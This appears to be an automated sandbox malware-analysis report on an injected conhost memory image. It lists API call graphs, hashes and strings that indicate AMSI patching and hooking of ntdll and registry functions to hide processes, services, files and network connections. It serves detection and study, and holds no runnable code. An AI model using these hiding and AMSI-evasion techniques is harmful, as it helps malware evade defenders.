13 API calls 8857->8858 8858->8856 9332 26504ea2ed8 9334 26504ea2f35 9332->9334 9333 26504ea2f50 9334->9333 9335 26504ea38a8 3 API calls 9334->9335 9335->9333 9336 26504eaf6dc 9337 26504eaf6e8 9336->9337 9339 26504eaf70f 9337->9339 9340 26504eb1c0c 9337->9340 9341 26504eb1c11 9340->9341 9342 26504eb1c4c 9340->9342 9343 26504eb1c44 9341->9343 9344 26504eb1c32 DeleteCriticalSection 9341->9344 9342->9337 9345 26504ead2a0 __free_lconv_mon 13 API calls 9343->9345 9344->9343 9344->9344 9345->9342 8859 26504ea25dc 8860 26504ea265a 8859->8860 8861 26504ea26bf GetFileType 8860->8861 8869 26504ea2777 8860->8869 8862 26504ea26cd StrCpyW 8861->8862 8863 26504ea26e1 8861->8863 8865 26504ea26ee 8862->8865 8864 26504ea1ad4 4 API calls 8863->8864 8864->8865 8866 26504ea3f88 StrCmpNIW 8865->8866 8867 26504ea3708 4 API calls 8865->8867 8868 26504ea1dd4 2 API calls 8865->8868 8865->8869 8866->8865 8867->8865 8868->8865

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                              • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                              • API String ID: 1735320900-4225371247
                              • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction ID: 793db5d285649f0967de13c818bf0ad4599756661b2382ebcc0fc16aee855e0f
                              • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                              • Instruction Fuzzy Hash: D551EF74104E2BE1EB05EF64EC4CBD52320B71C348F900997A50923272DE3AD26ECB93

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProcSleep
                              • String ID: AmsiScanBuffer$amsi.dll
                              • API String ID: 188063004-3248079830
                              • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction ID: 7dbb93ecc4044cf0b51a72b437f486b1054529f943d2880c9e7b3d7fe112b00c
                              • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction Fuzzy Hash: 46D01730615E23E1EA4AEF00EC5C3162221AB6CB44FD44458C00A022A0DE2EC45DC782

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32 ref: 0000026504EA3A35
                              • PathFindFileNameW.SHLWAPI ref: 0000026504EA3A44
                                • Part of subcall function 0000026504EA3F88: StrCmpNIW.SHLWAPI(?,?,?,0000026504EA272F), ref: 0000026504EA3FA0
                                • Part of subcall function 0000026504EA3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3EDB
                                • Part of subcall function 0000026504EA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F0E
                                • Part of subcall function 0000026504EA3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F2E
                                • Part of subcall function 0000026504EA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F47
                                • Part of subcall function 0000026504EA3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F68
                              • CreateThread.KERNELBASE ref: 0000026504EA3A8B
                                • Part of subcall function 0000026504EA1E74: GetCurrentThread.KERNEL32 ref: 0000026504EA1E7F
                                • Part of subcall function 0000026504EA1E74: CreateThread.KERNELBASE ref: 0000026504EA2043
                                • Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2049
                                • Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2055
                                • Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2061
                                • Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA206D
                                • Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2079
                                • Part of subcall function 0000026504EA1E74: TlsAlloc.KERNEL32 ref: 0000026504EA2085
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                              • String ID:
                              • API String ID: 2779030803-0
                              • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction ID: 2cd676e8b31c73f0be9385a218093f38ea2a2b631a323e1c87103920123586ad
                              • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                              • Instruction Fuzzy Hash: 7F117131B10F33D2FBA4D720A94D7AE6291AB5C349F504119DC86811D1EF7FE4788643
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction ID: 0330f1d165dfe9604ac687950ba5c4c5d131114b62702952c720303385d842d2
                              • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                              • Instruction Fuzzy Hash: AF911873B01A62C7DBA4CF25D608B7EB391F758BE4F5482249F4907788DA3AD812D701

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0000026504EA1724: GetProcessHeap.KERNEL32 ref: 0000026504EA172F
                                • Part of subcall function 0000026504EA1724: HeapAlloc.KERNEL32 ref: 0000026504EA173E
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA17AE
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA17DB
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA17F5
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1815
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA1830
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1850
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA186B
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA188B
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA18A6
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA18C6
                              • SleepEx.KERNELBASE ref: 0000026504EA1BDF
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA18E1
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1901
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA191C
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA193C
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA1957
                                • Part of subcall function 0000026504EA1724: RegOpenKeyExW.ADVAPI32 ref: 0000026504EA1977
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA1992
                                • Part of subcall function 0000026504EA1724: RegCloseKey.ADVAPI32 ref: 0000026504EA199C
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: CloseOpen$Heap$AllocProcessSleep
                              • String ID:
                              • API String ID: 948135145-0
                              • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction ID: 4a0a26ae3055c26c183cc6561d6818b90172101ba6bc5bbcf606c35cc31aafff
                              • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                              • Instruction Fuzzy Hash: 74314179300E63C1FB58DB27D5483A9E3A5EB4CBC0F0454619E09873D6EE26E8718317

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 197 26504ea2ff0-26504ea3069 199 26504ea306f-26504ea3075 197->199 200 26504ea3384-26504ea33a7 197->200 199->200 201 26504ea307b-26504ea307e 199->201 201->200 202 26504ea3084-26504ea3087 201->202 202->200 203 26504ea308d-26504ea309d GetModuleHandleA 202->203 204 26504ea309f-26504ea30af GetProcAddress 203->204 205 26504ea30b1 203->205 206 26504ea30b4-26504ea30d2 204->206 205->206 206->200 208 26504ea30d8-26504ea30f7 StrCmpNIW 206->208 208->200 209 26504ea30fd-26504ea3101 208->209 209->200 210 26504ea3107-26504ea3111 209->210 210->200 211 26504ea3117-26504ea311e 210->211 211->200 212 26504ea3124-26504ea3137 211->212 213 26504ea3147 212->213 214 26504ea3139-26504ea3145 212->214 215 26504ea314a-26504ea314e 213->215 214->215 216 26504ea3150-26504ea315c 215->216 217 26504ea315e 215->217 218 26504ea3161-26504ea316b 216->218 217->218 219 26504ea3251-26504ea3255 218->219 220 26504ea3171-26504ea3174 218->220 223 26504ea3376-26504ea337e 219->223 224 26504ea325b-26504ea325e 219->224 221 26504ea3186-26504ea3190 220->221 222 26504ea3176-26504ea3183 call 26504ea1a30 220->222 226 26504ea31c4-26504ea31ce 221->226 227 26504ea3192-26504ea319f 221->227 222->221 223->200 223->212 228 26504ea326f-26504ea3279 224->228 229 26504ea3260-26504ea326c call 26504ea1a30 224->229 234 26504ea31d0-26504ea31dd 226->234 235 26504ea31fe-26504ea3201 226->235 227->226 233 26504ea31a1-26504ea31ae 227->233 230 26504ea327b-26504ea3288 228->230 231 26504ea32a9-26504ea32ac 228->231 229->228 230->231 237 26504ea328a-26504ea3297 230->237 238 26504ea32ae-26504ea32b7 call 26504ea1cc4 231->238 239 26504ea32b9-26504ea32c6 lstrlenW 231->239 240 26504ea31b1-26504ea31b7 233->240 234->235 241 26504ea31df-26504ea31ec 234->241 243 26504ea320f-26504ea321c lstrlenW 235->243 244 26504ea3203-26504ea320d call 26504ea1cc4 235->244 246 26504ea329a-26504ea32a0 237->246 238->239 256 26504ea32ee-26504ea32f9 238->256 252 26504ea32c8-26504ea32d7 call 26504ea1cfc 239->252 253 26504ea32d9-26504ea32e3 call 26504ea3f88 239->253 250 26504ea31bd-26504ea31c2 240->250 251 26504ea3247-26504ea324c 240->251 254 26504ea31ef-26504ea31f5 241->254 247 26504ea322f-26504ea3241 call 26504ea3f88 243->247 248 26504ea321e-26504ea322d call 26504ea1cfc 243->248 244->243 244->251 246->256 257 26504ea32a2-26504ea32a7 246->257 247->251 261 26504ea32e6-26504ea32e8 247->261 248->247 248->251 250->226 250->240 251->261 252->253 252->256 253->261 254->251 264 26504ea31f7-26504ea31fc 254->264 265 26504ea3370-26504ea3374 256->265 266 26504ea32fb-26504ea32ff 256->266 257->231 257->246 261->223 261->256 264->235 264->254 265->223 271 26504ea3301-26504ea3305 266->271 272 26504ea3307-26504ea3321 call 26504eb3a40 266->272 271->272 273 26504ea3324-26504ea3327 271->273 272->273 276 26504ea3329-26504ea3347 call 26504eb3a40 273->276 277 26504ea334a-26504ea334d 273->277 276->277 277->265 279 26504ea334f-26504ea336d call 26504eb3a40 277->279 279->265
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                              • API String ID: 2119608203-3850299575
                              • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction ID: 20fbb97bfd9f556be3359b22d590838a28185d043352358c0ff25e75f835a07a
                              • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                              • Instruction Fuzzy Hash: A3B1E132314EB2C2EB69CF26D4087AAA3A4F74CB88F545016EE0953B94DF36DCA4C341
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                              • String ID:
                              • API String ID: 3140674995-0
                              • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction ID: 77824d61712215dd8e47e5dbc171aac6306ee6421f31e26b2471c8dfd60d1ee2
                              • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                              • Instruction Fuzzy Hash: 57315572205F91DAEB60DF60E8883EE7364F788748F44402ADA4E47B99EF39C658C711
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                              • String ID:
                              • API String ID: 1239891234-0
                              • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction ID: 1d60a88a30d1ad5a66103074b4f236235bd807cd550f8f5efba6955e4890ee39
                              • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                              • Instruction Fuzzy Hash: 68418E36214F91D6EB60CF24E8483AE73A4F788758F500216EB8D47BA9DF39C559CB41
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Find$CloseFile$FirstNext
                              • String ID:
                              • API String ID: 1164774033-0
                              • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction ID: 12f7e991f466f5409af2cb05b307022dc33fdb97a698e47539e44fdefb96c64e
                              • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                              • Instruction Fuzzy Hash: 27A16E32704FA2C9FB60DB75DC48BED6BA2E789794F144115DE8827FA5CA3AD051C302

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 2135414181-3414887735
                              • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction ID: f953eadb07875e8a9e2496f5d6cbf4ad833a91bd66c2b840444ea8b956270ec8
                              • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                              • Instruction Fuzzy Hash: 10712836210F66D6EB10DF21E89869E63A5FB8CB8CF441121DE4D43B28DF3AC458C381

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                              • String ID: d
                              • API String ID: 2005889112-2564639436
                              • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction ID: f1b42172e25e378621cac28406f5f78802e805ed928871f45552b209e44d79de
                              • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                              • Instruction Fuzzy Hash: A6515832210F95EAEB65CF66E84839AB7A1F788F98F444124DE4A07728EF3DC059C741

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                              • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                              • API String ID: 740688525-1880043860
                              • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction ID: a30cf240d0d21fcbf048c9e9b557f4dec90e83ad4ae2168b076acf1b4669581c
                              • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                              • Instruction Fuzzy Hash: 0151E131700F26D1EA25DF56A8483AA2390BB4CBB0F5807259E3D077D1EF3AE419C782

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Running Time
                              • API String ID: 1943346504-1805530042
                              • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction ID: bfa4ea229b3006601e921d5865d26c4459f3ace4a01edbe53ca46975f0687476
                              • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                              • Instruction Fuzzy Hash: 9B31E632604F62E7E722CF52E80C75AA3A0F78CBD9F440625DE4943B24DF39D46A8741

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$CounterInfoProcess$AllocFree
                              • String ID: \GPU Engine(*)\Utilization Percentage
                              • API String ID: 1943346504-3507739905
                              • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction ID: fcbcc7ff0caf07b780afa72e6d2acfabb61f0d367d9b4d0bad41c24aa32f53e3
                              • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                              • Instruction Fuzzy Hash: 79318031A10F62DAEB51DF26A88C75AA3E0F78CF98F444125DE4A43724EF39D456C741
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd
                              Similarity
                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                              • String ID: csm$csm$csm
                              • API String ID: 849930591-393685449
                              • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction ID: 6fdfba3c2dc8d2af56ec7303eebf260b500bdbada1b01f2e8dafe867669d4c93
                              • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                              • Instruction Fuzzy Hash: 82D1C372600FA2CAFB60DF65D68939E77A0FB5D7A8F100115EE8957B9ADB35C081C702

                              Control-flow Graph

                              • Executed
                              • Not Executed
